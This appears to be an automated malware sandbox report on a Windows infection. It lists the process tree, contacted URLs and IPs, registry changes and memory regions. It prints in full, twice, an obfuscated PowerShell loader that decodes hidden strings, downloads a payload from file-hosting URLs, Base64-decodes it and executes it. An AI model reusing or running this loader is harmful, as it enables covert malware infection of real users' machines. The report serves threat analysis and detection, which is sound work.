lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6
Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12
= Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv
PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted
'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom
OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over
2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk
C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals
tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP
ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF
rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte
($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd
SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef
el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml
T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes
Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl
elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs
InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while
(!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH
emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP
efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT
Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh
') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei
AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese
LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte
(Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre
Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi
DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist
O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r
WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$
Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa
el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm
syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t
RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte
(Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa
SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme
nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung.
');Udkrte $Eksilleder230;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function
Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke(
$Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted
'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste
MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt
LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben
1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu
tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl.
karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/
DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst
';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada
mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte
(Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom
OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over
2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk
C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals
tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP
ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF
rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte
($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd
SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef
el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml
T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes
Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl
elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs
InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while
(!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH
emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP
efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT
Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh
') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei
AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese
LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte
(Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre
Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi
DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist
O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r
WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$
Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa
el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm
syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t
RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte
(Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa
SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme
nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung.
');Udkrte $Eksilleder230;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/12aciiyl
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/i41a76XRll
|
unknown
|
||
|
http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.Service
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://stackoverflow.com/a/15123777)
|
unknown
|
||
|
http://tempuri.org/
|
unknown
|
||
|
http://www.computerhope.com/forum/index.php?topic=76293.0
|
unknown
|
||
|
https://fs13n1.sendspace.com/dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin
|
69.31.136.57
|
||
|
https://fs03n4.sendspace.com
|
unknown
|
||
|
http://tempuri.org/IRoamingSettingsService/WriteSettingsResponse
|
unknown
|
||
|
http://tempuri.org/IRoamingSettingsService/ReadSettings
|
unknown
|
||
|
http://stackoverflow.com/a/1465386/4224163
|
unknown
|
||
|
https://www.sendspace.com/
|
unknown
|
||
|
http://www.tutorialspoint.com/javascript/array_map.htm
|
unknown
|
||
|
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
|
unknown
|
||
|
http://SoftwareMicrosoft16.0CommonDebugHKEY_LOCAL_MACHINEHKEY_CURRENT_USER
|
unknown
|
||
|
http://tempuri.org/IRoamingSettingsService/GetConfigResponse
|
unknown
|
||
|
http://tempuri.org/IRoamingSettingsService/WriteSettingshttp://tempuri.org/IRoamingSettingsService/R
|
unknown
|
||
|
http://tempuri.org/IRoamingSettingsService/DisableUser
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aka.ms/pscore6lBjq
|
unknown
|
||
|
https://fs03n4.sendspaX
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://es5.github.io/#x15.4.4.21
|
unknown
|
||
|
http://tempuri.org/IRoamingSettingsService/EnableUserResponse
|
unknown
|
||
|
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/12aciiBl
|
unknown
|
||
|
http://tempuri.org/IRoamingSettingsService/WriteSettings
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://www.sendspace.com/pr
|
unknown
|
||
|
https://fs03n4.sendspace.com/dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm
|
69.31.136.17
|
||
|
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filter
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://fs13n1.sendspace.com/=6
|
unknown
|
||
|
https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmlhttps://javadl-esd-secure.oracle.com/upda
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/i41a76P
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/12acii
|
104.21.28.80
|
||
|
http://tempuri.org/IRoamingSettingsService/DisableUserResponse
|
unknown
|
||
|
http://java.sun.comnot
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/i41a76
|
104.21.28.80
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://javadl-esd-secure.oracle.com/update/%s/map-%s.xml
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
http://java.sun.com
|
unknown
|
||
|
https://www.sendspace.com/J
|
unknown
|
||
|
http://stackoverflow.com/questions/1026069/capitalize-the-first-letter-of-string-in-javascript
|
unknown
|
||
|
https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xml
|
unknown
|
||
|
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce
|
unknown
|
||
|
http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjectsItemsSortKeyArrayOfR
|
unknown
|
||
|
http://fs03n4.sendspace.com
|
unknown
|
||
|
http://tempuri.org/IRoamingSettingsService/GetConfig
|
unknown
|
||
|
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/Trim
|
unknown
|
||
|
http://stackoverflow.com/questions/1068834/object-comparison-in-javascript
|
unknown
|
||
|
http://tempuri.org/IRoamingSettingsService/ReadSettingsResponse
|
unknown
|
||
|
http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjects
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/indexOf
|
unknown
|
||
|
http://tempuri.org/IRoamingSettingsService/EnableUser
|
unknown
|
||
|
https://fs13n1.sendspace.com/
|
unknown
|
||
|
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
|
unknown
|
||
|
https://fs13n1.sendspace.com/Z6:
|
unknown
|
There are 58 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
fs03n4.sendspace.com
|
69.31.136.17
|
||
|
www.sendspace.com
|
104.21.28.80
|
||
|
fs13n1.sendspace.com
|
69.31.136.57
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
69.31.136.17
|
fs03n4.sendspace.com
|
United States
|
||
|
104.21.28.80
|
www.sendspace.com
|
United States
|
||
|
69.31.136.57
|
fs13n1.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
|
NULL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2506881F000
|
trusted library allocation
|
page read and write
|
|
|
|
61C3000
|
trusted library allocation
|
page read and write
|
|
|
|
966A000
|
direct allocation
|
page execute and read and write
|
|
|
|
74A0000
|
direct allocation
|
page execute and read and write
|
|
|
|
69E2000
|
heap
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
79DA000
|
heap
|
page read and write
|
||
|
25070AAD000
|
heap
|
page read and write
|
||
|
69D0000
|
heap
|
page read and write
|
||
|
2505A55C000
|
trusted library allocation
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
4FAF000
|
stack
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
379F000
|
stack
|
page read and write
|
||
|
21F4E000
|
stack
|
page read and write
|
||
|
22180000
|
remote allocation
|
page read and write
|
||
|
6C10000
|
heap
|
page read and write
|
||
|
7CFD000
|
stack
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
F6E96CD000
|
stack
|
page read and write
|
||
|
222F4000
|
direct allocation
|
page read and write
|
||
|
3520000
|
heap
|
page read and write
|
||
|
25058C3F000
|
trusted library allocation
|
page read and write
|
||
|
F6E8AFE000
|
stack
|
page read and write
|
||
|
222B8000
|
direct allocation
|
page read and write
|
||
|
342D000
|
trusted library allocation
|
page execute and read and write
|
||
|
250707B0000
|
heap
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
6890000
|
heap
|
page read and write
|
||
|
2505A582000
|
trusted library allocation
|
page read and write
|
||
|
222B0000
|
direct allocation
|
page read and write
|
||
|
3720000
|
heap
|
page readonly
|
||
|
11E927D0000
|
heap
|
page read and write
|
||
|
3359000
|
heap
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
6031000
|
trusted library allocation
|
page read and write
|
||
|
25058490000
|
trusted library allocation
|
page read and write
|
||
|
25059DF8000
|
trusted library allocation
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D8E000
|
stack
|
page read and write
|
||
|
152E3FF000
|
unkown
|
page read and write
|
||
|
222B0000
|
direct allocation
|
page read and write
|
||
|
5617000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
|
222C0000
|
direct allocation
|
page read and write
|
||
|
87C0000
|
trusted library allocation
|
page read and write
|
||
|
11E927D5000
|
heap
|
page read and write
|
||
|
36E2000
|
trusted library allocation
|
page read and write
|
||
|
25059001000
|
trusted library allocation
|
page read and write
|
||
|
250707BC000
|
heap
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
25070809000
|
heap
|
page read and write
|
||
|
7A91000
|
heap
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
88E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
|
25070A00000
|
heap
|
page execute and read and write
|
||
|
8E70000
|
direct allocation
|
page read and write
|
||
|
25058F7C000
|
trusted library allocation
|
page read and write
|
||
|
6BF0000
|
direct allocation
|
page read and write
|
||
|
334E000
|
stack
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
3515000
|
heap
|
page read and write
|
||
|
5020000
|
heap
|
page execute and read and write
|
||
|
7D00000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
8880000
|
heap
|
page read and write
|
||
|
8E40000
|
direct allocation
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
222EC000
|
direct allocation
|
page read and write
|
||
|
8D80000
|
trusted library allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
8DE0000
|
direct allocation
|
page read and write
|
||
|
250687B1000
|
trusted library allocation
|
page read and write
|
||
|
8BC1000
|
heap
|
page read and write
|
||
|
222AC000
|
direct allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
34B8000
|
heap
|
page read and write
|
||
|
2505681F000
|
heap
|
page read and write
|
||
|
22180000
|
remote allocation
|
page read and write
|
||
|
250589DD000
|
trusted library allocation
|
page read and write
|
||
|
35A0000
|
heap
|
page read and write
|
||
|
8AEC000
|
stack
|
page read and write
|
||
|
222B8000
|
direct allocation
|
page read and write
|
||
|
7CBE000
|
stack
|
page read and write
|
||
|
7C7F000
|
stack
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page read and write
|
||
|
68A0000
|
heap
|
page read and write
|
||
|
88F0000
|
trusted library allocation
|
page read and write
|
||
|
25056905000
|
heap
|
page read and write
|
||
|
25058C31000
|
trusted library allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
F6E8979000
|
stack
|
page read and write
|
||
|
7C3E000
|
stack
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
2208F000
|
